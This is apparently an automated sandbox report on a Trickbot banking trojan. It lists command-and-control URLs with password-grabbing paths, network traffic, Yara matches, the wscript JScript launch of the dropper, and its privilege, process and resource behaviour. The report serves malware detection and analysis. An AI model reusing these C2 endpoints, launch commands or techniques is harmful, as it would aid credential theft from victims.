Source: svchost.exe, 00000012.00000002.56180117106.0000000002148000.00000004.00000001.sdmp	String found in binary or memory: https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/DEBG/browser/
Source: svchost.exe, 00000012.00000002.56180117106.0000000002148000.00000004.00000001.sdmp	String found in binary or memory: https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/DPST/browser/8s
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	String found in binary or memory: https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/VERS/browser/:
Source: Login Data.bak.36.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search?ei=
Source: Login Data.bak.36.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49205
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49202
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49201
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49189
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49200
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown	Network traffic detected: HTTP traffic on port 49202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49209 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49204 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49199
Source: unknown	Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49198
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49197
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49196
Source: unknown	Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49195
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49194
Source: unknown	Network traffic detected: HTTP traffic on port 49201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49191
Source: unknown	Network traffic detected: HTTP traffic on port 49205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49190
Source: unknown	Network traffic detected: HTTP traffic on port 49208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49196 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49198 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49209
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49208
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49207
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49206

E-Banking Fraud:

Yara detected Trickbot

Show sources

Source: Yara match

File source: Process Memory Space: svchost.exe PID: 284, type: MEMORY

Yara detected Trickbot

Show sources

Source: Yara match	File source: 00000012.00000002.56178609261.00000000003A7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 284, type: MEMORY

System Summary:

Wscript called in batch mode (surpress errors)

Show sources

Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' /B /E:JScript 'C:\Users\user\AppData\Local\Temp\431846743.hum'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' /B /E:JScript 'C:\Users\user\AppData\Local\Temp\431846743.hum'			Jump to behavior

Abnormal high CPU Usage

Show sources

Source: C:\Windows\System32\wscript.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\431846743.exe	Memory allocated: 76ED0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\431846743.exe	Memory allocated: 76FF0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe	Memory allocated: 76ED0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe	Memory allocated: 76FF0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe	Memory allocated: 76ED0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe	Memory allocated: 76FF0000 page execute and read and write	Jump to behavior

Contains functionality to call native functions

Show sources

Source: C:\Windows\System32\svchost.exe

Code function: 18_2_0006A2B0 NtQueryInformationProcess,

18_2_0006A2B0

Contains functionality to launch a process as a different user

Show sources

Source: C:\Windows\System32\svchost.exe

Code function: 18_2_0007B420 LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,AdjustTokenPrivileges,

18_2_0007B420

Detected potential crypto function

Show sources

Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0006B160	14_2_0006B160
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00061180	14_2_00061180
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00065980	14_2_00065980
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00066B60	14_2_00066B60
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0007B420	14_2_0007B420
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00071820	14_2_00071820
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00068440	14_2_00068440
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0006A480	14_2_0006A480
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_000754B0	14_2_000754B0
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00062CCC	14_2_00062CCC
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00068CD0	14_2_00068CD0
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_000788E0	14_2_000788E0
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_000768F0	14_2_000768F0
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0006C960	14_2_0006C960
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0006BD80	14_2_0006BD80
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0007D190	14_2_0007D190
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_000649E0	14_2_000649E0
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00077650	14_2_00077650
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00066660	14_2_00066660
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00070660	14_2_00070660
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00071270	14_2_00071270
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_000782C0	14_2_000782C0
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_000756E0	14_2_000756E0
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00070EF0	14_2_00070EF0
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0007C2F0	14_2_0007C2F0
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0007AB10	14_2_0007AB10
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00061B50	14_2_00061B50
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0006E760	14_2_0006E760
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00064370	14_2_00064370
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00072FD0	14_2_00072FD0
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_000737D0	14_2_000737D0
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_000727E0	14_2_000727E0
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_0007B420	18_2_0007B420
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_000768F0	18_2_000768F0
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_0006B160	18_2_0006B160
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_0006C960	18_2_0006C960
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_0006BD80	18_2_0006BD80
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00061180	18_2_00061180
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00065980	18_2_00065980
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00070660	18_2_00070660
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_000782C0	18_2_000782C0
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_0007C2F0	18_2_0007C2F0
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_0007AB10	18_2_0007AB10
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00061B50	18_2_00061B50
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00066B60	18_2_00066B60
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00071820	18_2_00071820
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00068440	18_2_00068440
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_0006A480	18_2_0006A480
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_000754B0	18_2_000754B0
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00062CCC	18_2_00062CCC
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00068CD0	18_2_00068CD0
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_000788E0	18_2_000788E0
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_0007D190	18_2_0007D190
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_000649E0	18_2_000649E0
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00077650	18_2_00077650
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00066660	18_2_00066660
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00071270	18_2_00071270
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_000756E0	18_2_000756E0
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00070EF0	18_2_00070EF0
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_0006E760	18_2_0006E760
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00064370	18_2_00064370
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_000737D0	18_2_000737D0
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00072FD0	18_2_00072FD0
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_000727E0	18_2_000727E0
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_0006B160	21_2_0006B160
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00061180	21_2_00061180
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00065980	21_2_00065980
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_0007C2F0	21_2_0007C2F0
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_0007B420	21_2_0007B420
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00071820	21_2_00071820
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00068440	21_2_00068440
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_0006A480	21_2_0006A480
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000754B0	21_2_000754B0
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00062CCC	21_2_00062CCC
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00068CD0	21_2_00068CD0
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000788E0	21_2_000788E0
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000768F0	21_2_000768F0
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_0006C960	21_2_0006C960
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_0006BD80	21_2_0006BD80
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_0007D190	21_2_0007D190
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000649E0	21_2_000649E0
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00077650	21_2_00077650
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00066660	21_2_00066660
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00070660	21_2_00070660
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00071270	21_2_00071270
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000782C0	21_2_000782C0
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000756E0	21_2_000756E0
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00070EF0	21_2_00070EF0
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_0007AB10	21_2_0007AB10
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00061B50	21_2_00061B50
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00066B60	21_2_00066B60
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_0006E760	21_2_0006E760
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00064370	21_2_00064370
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_00072FD0	21_2_00072FD0
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000737D0	21_2_000737D0
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000727E0	21_2_000727E0
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018007C998	36_2_000000018007C998
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800949E0	36_2_00000001800949E0
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180096D20	36_2_0000000180096D20
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800796DC	36_2_00000001800796DC
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800B1758	36_2_00000001800B1758
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800A7D24	36_2_00000001800A7D24
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800BA050	36_2_00000001800BA050
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800BA050	36_2_00000001800BA050
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018000E070	36_2_000000018000E070
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800AA078	36_2_00000001800AA078
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800C40FC	36_2_00000001800C40FC
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180030108	36_2_0000000180030108
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018001015C	36_2_000000018001015C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800B6170	36_2_00000001800B6170
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018008E1F4	36_2_000000018008E1F4
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180046218	36_2_0000000180046218
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800AA254	36_2_00000001800AA254
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018001E278	36_2_000000018001E278
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800AC324	36_2_00000001800AC324
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018003434C	36_2_000000018003434C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800C8368	36_2_00000001800C8368
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180058374	36_2_0000000180058374
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018005A418	36_2_000000018005A418
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018003C420	36_2_000000018003C420
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018002A560	36_2_000000018002A560
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800A4624	36_2_00000001800A4624
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800966D0	36_2_00000001800966D0
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018005C738	36_2_000000018005C738
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018008C76C	36_2_000000018008C76C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018000C874	36_2_000000018000C874
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800928E8	36_2_00000001800928E8
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018006A930	36_2_000000018006A930
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018006692C	36_2_000000018006692C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180040948	36_2_0000000180040948
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800B4960	36_2_00000001800B4960
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180030980	36_2_0000000180030980
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180052990	36_2_0000000180052990
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800449D4	36_2_00000001800449D4
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018004EA90	36_2_000000018004EA90
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180018AE0	36_2_0000000180018AE0
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018005CAE4	36_2_000000018005CAE4
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180088AE4	36_2_0000000180088AE4
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800CEB2C	36_2_00000001800CEB2C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800A8CA0	36_2_00000001800A8CA0
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800C2CB8	36_2_00000001800C2CB8
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800C8D04	36_2_00000001800C8D04
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180026D18	36_2_0000000180026D18
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180048ECC	36_2_0000000180048ECC
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180090F28	36_2_0000000180090F28
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018007CF40	36_2_000000018007CF40
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018005AF68	36_2_000000018005AF68
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800C8F7C	36_2_00000001800C8F7C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018004CFAC	36_2_000000018004CFAC
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180050FF8	36_2_0000000180050FF8
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018000100C	36_2_000000018000100C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018008B09C	36_2_000000018008B09C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018006B0A4	36_2_000000018006B0A4
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800830B4	36_2_00000001800830B4
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800AB104	36_2_00000001800AB104
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180091180	36_2_0000000180091180
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018003D214	36_2_000000018003D214
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800C3250	36_2_00000001800C3250
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018007F2B4	36_2_000000018007F2B4
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800832C4	36_2_00000001800832C4
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800A32FC	36_2_00000001800A32FC
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180031367	36_2_0000000180031367
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180089370	36_2_0000000180089370
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800AF3B8	36_2_00000001800AF3B8
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018002F3E0	36_2_000000018002F3E0
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018008D428	36_2_000000018008D428
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018007549C	36_2_000000018007549C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800434B0	36_2_00000001800434B0
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018005F504	36_2_000000018005F504
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800A3504	36_2_00000001800A3504
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180095514	36_2_0000000180095514
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800235C4	36_2_00000001800235C4
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018009B5EC	36_2_000000018009B5EC
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018004D628	36_2_000000018004D628
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800776A8	36_2_00000001800776A8
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800896B0	36_2_00000001800896B0
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180057710	36_2_0000000180057710
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180093798	36_2_0000000180093798
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800597C4	36_2_00000001800597C4
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800817D1	36_2_00000001800817D1
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018000F800	36_2_000000018000F800
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018006984C	36_2_000000018006984C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180049878	36_2_0000000180049878
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800838B8	36_2_00000001800838B8
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800C38FC	36_2_00000001800C38FC
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800918F4	36_2_00000001800918F4
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180087920	36_2_0000000180087920
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180051948	36_2_0000000180051948
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800BF960	36_2_00000001800BF960
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800219C8	36_2_00000001800219C8
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800AF9D4	36_2_00000001800AF9D4
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018006BA60	36_2_000000018006BA60
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800BDAEC	36_2_00000001800BDAEC
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180029B24	36_2_0000000180029B24
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800ABB78	36_2_00000001800ABB78
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180037B94	36_2_0000000180037B94
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800D3BFC	36_2_00000001800D3BFC
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180087C00	36_2_0000000180087C00
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180095BF4	36_2_0000000180095BF4
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018005BC74	36_2_000000018005BC74
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800A3C88	36_2_00000001800A3C88
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018004FCC4	36_2_000000018004FCC4
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800ADD00	36_2_00000001800ADD00
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800CDCFC	36_2_00000001800CDCFC
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018005FD20	36_2_000000018005FD20
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180045D38	36_2_0000000180045D38
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018003BE18	36_2_000000018003BE18
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180025E28	36_2_0000000180025E28
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180067E78	36_2_0000000180067E78
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000000018000BEA4	36_2_000000018000BEA4
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180065F9C	36_2_0000000180065F9C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000000180087F98	36_2_0000000180087F98
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800BFFBC	36_2_00000001800BFFBC
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_0000000180001B4C	39_2_0000000180001B4C
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_0000000180002720	39_2_0000000180002720

Found potential string decryption / allocating functions

Show sources

Source: C:\Windows\System32\svchost.exe	Code function: String function: 000000018002AC08 appears 54 times
Source: C:\Windows\System32\svchost.exe	Code function: String function: 0000000180001804 appears 33 times
Source: C:\Windows\System32\svchost.exe	Code function: String function: 0000000180028A10 appears 39 times
Source: C:\Windows\System32\svchost.exe	Code function: String function: 000000018000F3E0 appears 41 times
Source: C:\Windows\System32\svchost.exe	Code function: String function: 000000018000F534 appears 153 times
Source: C:\Windows\System32\svchost.exe	Code function: String function: 000000018000FFC4 appears 124 times

PE file contains strange resources

Show sources

Source: 431846743.exe.9.dr	Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 431846743.exe.9.dr	Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 431846743.exe.9.dr	Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 431846743.exe.9.dr	Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 431846743.exe.9.dr	Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 231824723.exe.14.dr	Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 231824723.exe.14.dr	Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 231824723.exe.14.dr	Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 231824723.exe.14.dr	Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: 231824723.exe.14.dr	Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Show sources

Source: C:\Windows\System32\svchost.exe

Section loaded: nss3.dll

Jump to behavior

Classification label

Show sources

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winJSE@20/7@4/8

Contains functionality to adjust token privileges (e.g. debug / backup)

Show sources

Source: C:\Windows\System32\svchost.exe	Code function: 18_2_0007B420 LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,AdjustTokenPrivileges,	18_2_0007B420
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00072350 AdjustTokenPrivileges,RevertToSelf,CloseHandle,AdjustTokenPrivileges,CloseHandle,	18_2_00072350
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_00000001800B1870 GetCurrentProcess,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	36_2_00000001800B1870

Contains functionality to enum processes or threads

Show sources

Source: C:\Windows\System32\svchost.exe

Code function: 18_2_0006BA80 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,

18_2_0006BA80

Contains functionality to instantiate COM classes

Show sources

Source: C:\Windows\System32\svchost.exe

Code function: 14_2_00077C20 CoCreateInstance,

14_2_00077C20

Contains functionality to load and extract PE file embedded resources

Show sources

Source: C:\Users\user\AppData\Local\Temp\431846743.exe

Code function: 13_2_004013F6 _EH_prolog,strlen,FindResourceA,strlen,atoi,atoi,VirtualAllocExNuma,atoi,VirtualAllocExNuma,#1134,#2621,#2514,#641,

13_2_004013F6

Creates files inside the user directory

Show sources

Source: C:\Windows\System32\svchost.exe

File created: C:\Users\user\AppData\Roaming\WinNetCore

Jump to behavior

Creates mutexes

Show sources

Source: C:\Windows\System32\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\789C000000010
Source: C:\Windows\System32\svchost.exe	Mutant created: \BaseNamedObjects\Global\789C000000010

Creates temporary files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\431846743.tum

Jump to behavior

Queries process information (via WMI, Win32_Process)

Show sources

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process
